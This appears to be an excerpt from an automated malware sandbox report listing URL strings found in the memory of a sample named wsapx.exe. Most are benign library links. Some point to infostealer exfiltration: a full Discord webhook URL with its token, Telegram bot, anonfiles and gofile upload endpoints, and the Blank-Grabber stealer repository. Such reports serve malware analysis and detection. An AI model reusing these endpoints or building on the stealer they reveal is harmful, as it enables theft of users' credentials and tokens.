00000000.00000003.2148711181.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152644309.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: wsapx.exe, 00000000.00000003.2148798115.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149091073.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148327844.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150381202.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148926575.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152412963.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148557880.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149277761.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2151201256.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150867444.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150947438.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149184573.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148442290.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152239767.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148711181.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152644309.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: wsapx.exe, 00000000.00000003.2151872993.0000015A08630000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: wsapx.exe, 00000000.00000003.2151872993.0000015A08630000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.thawte.com0
Source: powershell.exe, 00000041.00000002.2442904993.000001FAD4E0B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: wsapx.exe, 00000000.00000003.2151872993.0000015A08630000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: wsapx.exe, 00000000.00000003.2151872993.0000015A08630000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.symcd.com06
Source: powershell.exe, 0000000B.00000002.2263605331.000002A22AE69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 0000000B.00000002.2263605331.000002A22AC41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.2442904993.000001FAD3521000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000B.00000002.2263605331.000002A22AE69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: wsapx.exe, 00000002.00000002.2655861700.000001C87A3B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
Source: wsapx.exe, 00000000.00000003.2151872993.0000015A08630000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: wsapx.exe, 00000000.00000003.2151872993.0000015A08630000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: wsapx.exe, 00000000.00000003.2151872993.0000015A08630000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: wsapx.exe, 00000000.00000003.2151872993.0000015A08630000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: wsapx.exe, 00000000.00000003.2151872993.0000015A08630000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: wsapx.exe, 00000000.00000003.2151872993.0000015A08630000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: powershell.exe, 00000041.00000002.2442904993.000001FAD4B26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000041.00000002.2442904993.000001FAD4E0B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: wsapx.exe, 00000000.00000003.2148798115.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149091073.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148327844.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150381202.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148926575.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152412963.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148557880.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149277761.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2151201256.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150867444.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150947438.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149184573.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148442290.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152239767.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148711181.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152644309.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: wsapx.exe, 00000002.00000003.2342123848.000001C879E0E000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2653029394.000001C879D92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
Source: wsapx.exe, 00000002.00000002.2655982929.000001C87A528000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://MD8.mozilla.org/1/m
Source: wsapx.exe, 00000002.00000003.2645964472.000001C87A11D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: wsapx.exe, 00000002.00000002.2665843936.000001C87B218000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://account.bellmedia.c
Source: powershell.exe, 0000000B.00000002.2263605331.000002A22AC41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.2442904993.000001FAD3521000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: wsapx.exe, 00000002.00000002.2665843936.000001C87B1E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://allegro.pl/
Source: wsapx.exe, 00000002.00000002.2652913011.000001C879C30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.anonfiles.com/upload
Source: wsapx.exe, 00000002.00000002.2652913011.000001C879C30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.gofile.io/getServer
Source: wsapx.exe, 00000002.00000003.2649750840.000001C87A0D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.stripe.com/v
Source: wsapx.exe, 00000002.00000002.2652913011.000001C879C30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: wsapx.exe, 00000002.00000002.2655982929.000001C87A528000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mo
Source: wsapx.exe, 00000002.00000003.2645964472.000001C87A11D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: wsapx.exe, 00000002.00000003.2645964472.000001C87A11D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: wsapx.exe, 00000002.00000003.2645964472.000001C87A11D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000041.00000002.2501155359.000001FAE359B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000041.00000002.2501155359.000001FAE359B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000041.00000002.2501155359.000001FAE359B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: wsapx.exe, 00000000.00000003.2151872993.0000015A08630000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/cps0%
Source: wsapx.exe, 00000000.00000003.2151872993.0000015A08630000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0
Source: wsapx.exe, 00000000.00000003.2151872993.0000015A08630000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0.
Source: wsapx.exe, 00000002.00000002.2652550668.000001C879930000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/v9/users/
Source: wsapx.exe, 00000002.00000002.2655646494.000001C87A2A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/webhooks/1267176433306829014/YhEVi7QXrkO9uMJodvR8Fp2e6uTZlqxB6sVXodhGTQI4MPs
Source: wsapx.exe, 00000002.00000003.2418159022.000001C87A0BE000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2421489362.000001C87A0C7000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2648686643.000001C87A0BE000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2654490430.000001C87A0D8000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2649750840.000001C87A0D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discordapp.com/api/v
Source: wsapx.exe, 00000002.00000002.2652550668.000001C879930000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://discordapp.com/api/v9/users/
Source: wsapx.exe, 00000002.00000002.2652361959.000001C879844000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2158361673.000001C879A7C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
Source: wsapx.exe, 00000002.00000002.2651928878.000001C8794D0000.00000004.00001000.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155877096.000001C879826000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155859457.000001C879832000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
Source: wsapx.exe, 00000002.00000003.2155877096.000001C879826000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2651928878.000001C87954C000.00000004.00001000.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155859457.000001C879832000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
Source: wsapx.exe, 00000002.00000003.2155877096.000001C879826000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2651928878.000001C87954C000.00000004.00001000.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155859457.000001C879832000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
Source: wsapx.exe, 00000002.00000003.2155877096.000001C879826000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2651928878.000001C87954C000.00000004.00001000.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155859457.000001C879832000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
Source: wsapx.exe, 00000002.00000003.2155877096.000001C879826000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2651928878.000001C87954C000.00000004.00001000.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155859457.000001C879832000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module
Source: wsapx.exe, 00000002.00000002.2652231018.000001C879720000.00000004.00001000.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155877096.000001C879826000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155859457.000001C879832000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
Source: wsapx.exe, 00000002.00000002.2652231018.000001C879720000.00000004.00001000.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155877096.000001C879826000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155859457.000001C879832000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
Source: wsapx.exe, 00000002.00000003.2155877096.000001C879826000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2651928878.000001C87954C000.00000004.00001000.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155859457.000001C879832000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
Source: wsapx.exe, 00000002.00000003.2155967601.000001C879827000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155877096.000001C879826000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2652361959.000001C879820000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155859457.000001C879832000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
Source: wsapx.exe, 00000002.00000003.2645964472.000001C87A11D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: wsapx.exe, 00000002.00000003.2645964472.000001C87A11D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: wsapx.exe, 00000002.00000003.2645964472.000001C87A11D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: wsapx.exe, 00000002.00000002.2655646494.000001C87A310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
Source: edb.log.23.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 00000017.00000003.2237389156.00000266ECFA0000.00000004.00000800.00020000.00000000.sdmp, edb.log.23.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: wsapx.exe, 00000002.00000002.2652550668.000001C879930000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Blank-c/Blank-Grabber
Source: wsapx.exe, 00000002.00000003.2175226074.000001C87A147000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2175509272.000001C879D31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Blank-c/BlankOBF
Source: powershell.exe, 00000041.00000002.2442904993.000001FAD4E0B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: wsapx.exe, 00000002.00000003.2155967601.000001C879827000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155877096.000001C879826000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2652361959.000001C879820000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155859457.000001C879832000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
Source: wsapx.exe, 00000002.00000003.2155877096.000001C879826000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2651928878.000001C87954C000.00000004.00001000.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155859457.000001C879832000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
Source: wsapx.exe, 00000002.00000003.2155859457.000001C879832000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
Source: wsapx.exe, 00000002.00000003.2155967601.000001C879827000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155877096.000001C879826000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2652361959.000001C879820000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155859457.000001C879832000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
Source: wsapx.exe, 00000002.00000003.2181268132.000001C879EBD000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2182287470.000001C879EBE000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2183214516.000001C879D58000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2180252331.000001C879D49000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2180078817.000001C879EBD000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2653029394.000001C879D58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/issues/86361.
Source: wsapx.exe, 00000002.00000003.2155967601.000001C879827000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155877096.000001C879826000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2652361959.000001C879820000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155859457.000001C879832000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
Source: wsapx.exe, 00000002.00000002.2655646494.000001C87A310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
Source: wsapx.exe, 00000002.00000003.2185307895.000001C87A029000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/251
Source: wsapx.exe, 00000002.00000003.2650036552.000001C879A3B000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2421570501.000001C879A3C000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2652705935.000001C879A3C000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2366438701.000001C879A3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
Source: wsapx.exe, 00000002.00000002.2655982929.000001C87A4C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
Source: wsapx.exe, 00000002.00000002.2655861700.000001C87A3B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/3290
Source: powershell.exe, 00000041.00000002.2442904993.000001FAD43FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: wsapx.exe, 00000002.00000003.2307866368.000001C879EAD000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2652361959.000001C8798CB000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2306855600.000001C87A0C3000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2335221807.000001C879FA0000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2324012441.000001C87A0C5000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2650036552.000001C879A3B000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2307866368.000001C879E7C000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2421570501.000001C879A3C000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2652705935.000001C879A3C000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2366438701.000001C879A3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/
Source: wsapx.exe, 00000002.00000002.2654490430.000001C87A0C5000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2418159022.000001C87A0BE000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2421963487.000001C87A0BE000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2370327129.000001C87A0C5000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2358812914.000001C87A0C5000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2648686643.000001C87A0BE000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2307866368.000001C879EAD000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2306855600.000001C87A0C3000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2324012441.000001C87A0C5000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2650036552.000001C879A3B000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2421570501.000001C879A3C000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2652705935.000001C879A3C000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2366438701.000001C879A3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/mail
Source: wsapx.exe, 00000002.00000002.2653029394.000001C879D92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/mail/
Source: wsapx.exe, 00000002.00000002.2652913011.000001C879C30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gstatic.com/generate_204
Source: wsapx.exe, 00000002.00000003.2326531713.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2184526777.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2419336236.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2653479428.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2307866368.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2646879000.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2335221807.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2353669129.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2420350935.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://html.spec.whatwg.org/multipage/
Source: wsapx.exe, 00000002.00000003.2307866368.000001C879E7C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/
Source: wsapx.exe, 00000002.00000002.2655982929.000001C87A4C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://importlib-resources.readthedocs.io/en/latest/using.html#migrating-from-legacy
Source: wsapx.exe, 00000002.00000003.2182778701.000001C879E2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://json.org
Source: wsapx.exe, 00000002.00000002.2665843936.000001C87B25C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: wsapx.exe, 00000002.00000002.2665843936.000001C87B248000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com
Source: powershell.exe, 0000000B.00000002.2289972214.000002A23ACB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.2442904993.000001FAD4F50000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.2501155359.000001FAE36DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.2501155359.000001FAE359B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000041.00000002.2442904993.000001FAD4B26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000041.00000002.2442904993.000001FAD4B26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX
Source: wsapx.exe, 00000002.00000002.2655489440.000001C87A180000.00000004.00001000.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2655982929.000001C87A4C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://packaging.python.org/specifications/entry-points/
Source: wsapx.exe, 00000002.00000002.2652550668.000001C879930000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://peps.python.org/pep-0205/
Source: wsapx.exe, 00000002.00000002.2667746115.00007FFD941D4000.00000040.00000001.01000000.00000004.sdmp	String found in binary or memory: https://peps.python.org/pep-0263/
Source: wsapx.exe, 00000002.00000003.2650218345.000001C879FFE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png
Source: wsapx.exe, 00000000.00000003.2151872993.0000015A08630000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: wsapx.exe, 00000002.00000003.2342123848.000001C879EF5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org
Source: wsapx.exe, 00000002.00000003.2333612973.000001C87AA5E000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2312078501.000001C87A11D000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2306855600.000001C87A093000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2312208578.000001C87AA86000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2324012441.000001C87A093000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2358812914.000001C87A093000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: wsapx.exe, 00000002.00000003.2312078501.000001C87A11D000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2312208578.000001C87AA86000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2421570501.000001C879A3C000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2366438701.000001C879A3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefox
Source: wsapx.exe, 00000002.00000003.2333612973.000001C87AA5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
Source: wsapx.exe, 00000002.00000002.2653029394.000001C879D92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
